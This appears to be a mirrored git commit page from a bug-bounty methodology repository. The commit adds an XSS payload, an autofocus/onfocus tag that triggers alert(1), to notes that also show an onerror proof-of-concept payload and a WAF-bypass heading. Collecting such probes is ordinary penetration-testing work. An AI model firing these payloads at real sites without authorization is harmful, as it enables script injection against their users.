mirror of
https://github.com/xalgord/My-Methodologies.git
synced 2024-11-24 20:53:08 +00:00
GITBOOK-116: change request with no subject merged in GitBook
This commit is contained in:
parent
76e5650421
commit
73735acaa5
1 changed files with 6 additions and 0 deletions
|
@ -41,6 +41,12 @@ The vulnerable parameter for XSS should have Unfiltered : **\[“ ‘ < > $ | (
|
|||
"><img%20src=x%20onerror="alert(%27POC%20By%20Xalgord%27)"
|
||||
```
|
||||
|
||||
**any name tag xss payload:**
|
||||
|
||||
```
|
||||
<x onfocus=alert(1) autofocus tabindex=1>
|
||||
```
|
||||
|
||||
**Bypass Waf Pyaload:**
|
||||
|
||||
```
|
||||
|
|
Loading…
Reference in a new issue